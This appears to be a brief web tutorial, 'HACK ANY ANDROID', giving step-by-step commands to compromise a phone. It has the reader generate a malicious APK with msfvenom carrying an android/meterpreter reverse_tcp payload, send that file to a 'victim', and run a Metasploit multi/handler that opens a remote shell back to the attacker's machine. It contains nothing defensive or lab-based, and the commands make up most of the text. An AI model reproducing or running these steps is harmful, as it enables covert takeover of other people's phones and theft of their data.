HACK ANY ANDROID

ANDROID HACK

#1. Open Kali terminal on your PC.

#2. We will be going to use “MSFVENOM” to create a malicious apk file that we will install on the android phone.

#3. Paste these given commands in the terminal.

msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.27.207 R > root/tricksgum.apk


#4. Change the “LHOST” to your local IP address and press enter.

#5. Now open the root folder and send the tricksgum.apk to the victim. (As shown in pictures)

#6.  Open a new terminal and enter “msfconsole.”

#7. After opening Metasploit console type these following commands which are used to create payload handler which will create a connection between the victim and Kali PC.

use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 172.16.27.207 exploit

Comments